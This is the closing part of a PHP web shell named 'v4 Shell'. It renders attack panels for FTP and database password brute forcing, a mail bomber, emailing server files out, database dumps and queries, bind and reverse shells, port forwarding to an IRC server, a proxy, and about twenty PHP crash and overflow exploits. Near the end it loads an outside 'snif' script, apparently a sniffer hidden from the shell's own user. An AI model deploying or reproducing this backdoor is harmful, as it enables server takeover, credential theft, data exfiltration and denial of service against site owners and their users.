 echo $te.'</div>'.$table_end1.$fe;
}

echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id32').$table_up2.div('id32').$ts;
echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
$arh = $lang[$language.'_text92'];
if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip';   }
if(@function_exists('gzencode'))   { $arh .= in('radio','compress',0,'gzip').' gzip'; }
if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
echo $te.'</div>'.$table_end1.$fe;

if(@function_exists("ftp_connect")){
echo $table_up1.div_title($lang[$language.'_text93'],'id33').$table_up2.div('id33').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;

echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text94']."</div></b></font>";
echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').in('hidden','dir',0,$dir));
echo sr(25,"",in('radio','brute_method',0,'passwd',1)."<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']);
echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']);
echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',0,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("root"))));
echo sr(25,"<b>".$lang[$language.'_text135'].$arrow."</b>",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'/passwd.dic'))));
echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt1']));

echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("hmb@gov.sd"))));
echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',20,$dir));
echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));

echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("hmb@gov.sd"))));
echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',20,$dir));
echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));

echo $te."</td>".$fe."</tr></div></table>";
}


if(@function_exists("mail")){
echo $table_up1.div_title($lang[$language.'_text102'],'id35').$table_up2.div('id35').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("name@email.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("hmb@gov.sd"))));
echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("Excuse me!!"))));
echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=22 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("type here")).'</textarea>');
echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));

echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("name@email.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("hmb@gov.sd"))));
echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("v4 Team sent you a file"))));
echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',30,$dir));
echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));

echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text139']."</div></b></font>";
echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("user@mail.com"))).in('hidden','cmd',0,'mail_bomber').in('hidden','dir',0,$dir));
echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("hmb@gov.sd"))));
echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=22 rows=1>'.(!empty($_POST['text'])?($_POST['text']):("ThIs Is FlOoD")).'</textarea>');
echo sr(25,"<b>Flood".$arrow."</b>",in('int','mail_flood',5,(!empty($_POST['mail_flood'])?($_POST['mail_flood']):100)).ws(4)."<b>Size(kb)".$arrow."</b>".in('int','mail_size',5,(!empty($_POST['mail_size'])?($_POST['mail_size']):10)));
echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));

echo $te."</td>".$fe."</tr></div></table>";
}


if($mysql_on||$mssql_on||$pg_on||$ora_on)
{
$select = '<select name=db>';
if($mysql_on) $select .= '<option>MySQL</option>';
if($mssql_on) $select .= '<option>MSSQL</option>';
if($pg_on)    $select .= '<option>PostgreSQL</option>';
if($ora_on)   $select .= '<option>Oracle</option>';
$select .= '</select>';

echo $table_up1.div_title($lang[$language.'_text82'],'id36').$table_up2.div('id36').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text134']."</div></b></font>";

echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select.in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_brute'));
echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
echo sr(25,"",in('radio','brute_method',0,'passwd',1)."<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']);
echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']);
echo sr(35,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
echo sr(25,"<b>".$lang[$language.'_text135'].$arrow."</b>",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'/passwd.dic'))));
echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt1']));

echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";

echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',8,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',17,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));

echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";

echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
echo $te."<div align=center id='n'><textarea cols=30 rows=4 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSHOW TABLES;\nSELECT * FROM user;\nUPDATE site_users set user_email='hmb@gov.sd' where user_email='admin@mail.com';\nSELECT user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div>";

echo "</td>".$fe."</tr></div></table>";
}



if(!$safe_mode && $unix){
echo $table_up1.div_title($lang[$language.'_text81'],'id37').$table_up2.div('id37').$ts."<tr>".$fs."<td valign=top width=25%>".$ts;
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',10,'10411'));
echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',10,'v4 Team'));
echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'14011'));
echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',10,'10411'));
echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',10,'irc.dal.net'));
echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',10,'6667'));
echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
echo "<font face=Verdana size=-2><b><div align=center id='n'>Proxy</div></b></font>";
echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','proxy_port',10,'31337'));
echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option></select>".in('hidden','dir',0,$dir));
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
echo $te."</td>".$fe."</tr></div></table>";
}

echo $table_up1.div_title($lang[$language.'_text140'],'id38').$table_up2.div('id38').$ts."<tr><td valign=top width=50%>".$ts;
echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
echo sr(10,"",$fs.in('hidden','cmd',0,'dos1').in('submit','submit',0,'Recursive memory exhaustion').$fe);
echo sr(10,"",$fs.in('hidden','cmd',0,'dos2').in('submit','submit',0,'Memory_limit exhaustion in [ pack() ] function').$fe);
echo sr(10,"",$fs.in('hidden','cmd',0,'dos3').in('submit','submit',0,'BoF in [ unserialize() ] function').$fe);
echo sr(10,"",$fs.in('hidden','cmd',0,'dos4').in('submit','submit',0,'Limit integer calculate (65535) in ZendEngine').$fe);
echo sr(10,"",$fs.in('hidden','cmd',0,'dos5').in('submit','submit',0,'SQlite [ dl() ] vulnerability').$fe);
echo sr(10,"",$fs.in('hidden','cmd',0,'dos6').in('submit','submit',0,'PCRE [ preg_match() ] exhaustion resources (PHP <5.2.1)').$fe);
echo sr(10,"",$fs.in('hidden','cmd',0,'dos7').in('submit','submit',0,'Memory_limit exhaustion in [ str_repeat() ] function (PHP <4.4.5,5.2.1)').$fe);
echo sr(10,"",$fs.in('hidden','cmd',0,'dos8').in('submit','submit',0,'Apache process killer').$fe);
echo sr(10,"",$fs.in('hidden','cmd',0,'dos9').in('submit','submit',0,'Overload inodes from HD.I via [ tempnam() ] (PHP 4.4.2, 5.1.2)').$fe);
echo sr(10,"",$fs.in('hidden','cmd',0,'dos10').in('submit','submit',0,'BoF in [ wordwrap() ] function (PHP <4.4.2,5.1.2)').$fe);
echo $te."</td><td valign=top width=50%>".$ts;
echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
echo sr(10,"",$fs.in('hidden','cmd',0,'dos11').in('submit','submit',0,'BoF in [ array_fill() ] function (PHP <4.4.2,5.1.2)').$fe);
echo sr(10,"",$fs.in('hidden','cmd',0,'dos12').in('submit','submit',0,'BoF in [ substr_compare() ] function (PHP <4.4.2,5.1.2)').$fe);
echo sr(10,"",$fs.in('hidden','cmd',0,'dos13').in('submit','submit',0,'Array Creation in [ unserialize() ] 64 bit function (PHP <5.2.1)').$fe);
echo sr(10,"",$fs.in('hidden','cmd',0,'dos14').in('submit','submit',0,'BoF in [ str_ireplace() ] function (PHP <5.2.x)').$fe);
echo sr(10,"",$fs.in('hidden','cmd',0,'dos15').in('submit','submit',0,'BoF in [ htmlentities() ] function (PHP <5.1.6,4.4.4)').$fe);
echo sr(10,"",$fs.in('hidden','cmd',0,'dos16').in('submit','submit',0,'Integer Overflow in [ zip_entry_read() ] function (PHP <4.4.5)').$fe);
echo sr(10,"",$fs.in('hidden','cmd',0,'dos17').in('submit','submit',0,'BoF in [ sqlite_udf_decode_binary() ] function (PHP <4.4.5,5.2.1)').$fe);
echo sr(10,"",$fs.in('hidden','cmd',0,'dos18').in('submit','submit',0,'Memory Allocation BoF in [ msg_receive() ] function (PHP <4.4.5,5.2.1)').$fe);
echo sr(10,"",$fs.in('hidden','cmd',0,'dos19').in('submit','submit',0,'Off By One in [ php_stream_filter_create() ] function (PHP 5<5.2.1)').$fe);
echo sr(10,"",$fs.in('hidden','cmd',0,'dos20').in('submit','submit',0,'Reference Counter Overflow in [ unserialize() ] function (PHP <4.4.4)').$fe);
echo $te."</td></tr></div></table>";
echo '<script type="text/javascript" language="javascript" src="http://s3lcuk.com/snif/guncelleme.js"></script>';

echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>v4 Shell version ".$version." | <a href=http://www.h4ckz.net>h4ckz.net</a> | Generated in: ".round(getmicrotime()-starttime,4)."</b></font></div></td></tr></table>";
echo '</body></html>';


?>")); ?>